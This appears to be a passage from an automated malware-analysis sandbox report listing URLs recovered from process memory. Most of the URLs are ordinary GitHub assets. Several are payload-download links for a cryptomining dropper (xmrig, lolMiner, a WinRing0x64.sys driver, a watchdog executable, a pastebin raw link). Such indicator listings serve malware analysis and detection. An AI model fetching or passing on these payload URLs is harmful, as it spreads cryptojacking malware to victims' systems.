                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8LR
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9LR
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002508000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2891282410.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                  Source: RegSvcs.exe, 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/X
                  Source: Amcache.hve.9.drString found in binary or memory: http://upx.sf.net
                  Source: powershell.exe, 00000012.00000002.1771702120.0000000004F96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000012.00000002.1771702120.0000000004E41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.github.com/_private/browser/errors
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.github.com/_private/browser/stats
Source: 4usfliof.exe, 00000004.00000003.1664492512.0000000001272000.00000040.00001000.00020000.00000000.sdmp, 4usfliof.exe, 00000004.00000002.1834530899.00000000009BD000.00000004.00000001.01000000.00000009.sdmp, RegSvcs.exe, 00000006.00000002.2888940061.00000000005A2000.00000020.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://avatars.githubusercontent.com
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://collector.github.com/github/collect
Source: powershell.exe, 00000012.00000002.1774355211.0000000005EAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000012.00000002.1774355211.0000000005EAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000012.00000002.1774355211.0000000005EAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.github.com
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.github.com/get-started/accessibility/keyboard-shortcuts
Source: RegSvcs.exe, 0000000B.00000002.1729640854.00000000004D3000.00000002.00000400.00020000.00000000.sdmp String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github-cloud.s3.amazonaws.com
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.blog
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006971000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com
Source: powershell.exe, 00000012.00000002.1771702120.0000000004F96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/S1lentHash/file_to_dwnld/raw/main/WinRing0x64.sys
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/S1lentHash/file_to_dwnld/raw/main/WinRing0x64.sys"
Source: RegSvcs.exe, 0000000B.00000002.1729806081.0000000001377000.00000004.00000010.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1787181662.0000000000402000.00000020.00000400.00020000.00000000.sdmp String found in binary or memory: https://github.com/S1lentHash/file_to_dwnld/raw/main/WinRing0x64.sysChttps://pastebin.com/raw/PTNbBX
Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/S1lentHash/lolminer/raw/main/lolMiner.exe
Source: AppLaunch.exe, 0000000F.00000002.1789091903.000000000698C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/S1lentHash/newwatch/raw/main/NewNewWatch.exe
Source: RegSvcs.exe, 0000000B.00000002.1729806081.0000000001377000.00000004.00000010.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1787181662.0000000000402000.00000020.00000400.00020000.00000000.sdmp String found in binary or memory: https://github.com/S1lentHash/newwatch/raw/main/NewNewWatch.exeyhttps://github.com/S1lentHash/lolmin
Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/S1lentHash/xmrig/raw/main/xmrig.exe
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/S1lentHash/xmrig/raw/main/xmrig.exe"
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/collections
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/customer-stories
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/enterprise
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/enterprise/advanced-security
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/enterprise/startups
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/features
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/features/actions
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/features/code-review
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/features/codespaces
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.000000000692B000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/features/copilot
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/features/discussions
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/features/issues
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/features/packages
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/features/security
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/fluidicon.png
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/readme
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/solutions/ci-cd
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/solutions/devops
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/solutions/devsecops
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/solutions/industries/financial-services
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/solutions/industries/healthcare
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/solutions/industries/manufacturing
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/team
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/topics
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/trending
Source: AppLaunch.exe, 0000000F.00000002.1789091903.000000000698C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.comD
Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/
Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/a
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_as
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_m
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_blob-anchor_ts-app_assets_modules_g
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-11260080
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/behaviors-d6d4678bf9a9.js
Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/dark-9c5b7a476542.css
Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/dark_colorblind-56fff47acadc.css
Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/dark_dimmed-afda8eb0fb33.css
Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/dark_high_contrast-2494e44ccdc5.css
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/dark_tritanopia-68d6b2c79663.css
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/element-registry-d1e61f0bd7b5.js
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/environment-924e60bca7d2.js
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/error-4eb12c8f65b5.css
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/github-e4eed26e112b.css
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/github-elements-508a45ca23c6.js
Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/github-logo-55c5b9a1fe52.png
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/github-mark-57519b92ca4e.png
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/github-octocat-13c86b8b336d.png
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/global-9e6d890d55ca.css
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/keyboard-shortcuts-dialog-a84d01efac8c.js
Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/light-3e154969b9f9.css
Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/light_colorblind-71cd4cc132ec.css
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/light_high_contrast-fd5499848985.css
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/light_tritanopia-31d17ba3e139.css
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/mona-sans-d1bf285e9b9b.woff2
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/notifications-global-54f34167118d.js
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/pinned-octocat-093da3e6fa40.svg
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/primer-ff8ec1db4f06.css
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/primer-primitives-4cf0d59ab51a.css
Source: AppLaunch.exe, 0000000F.00000002.1790516666.00000000078AA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1790516666.00000000078BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006A8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.githubassets.com/assets/primer-react-css.8570b2718b0a9c0c8387.module.css
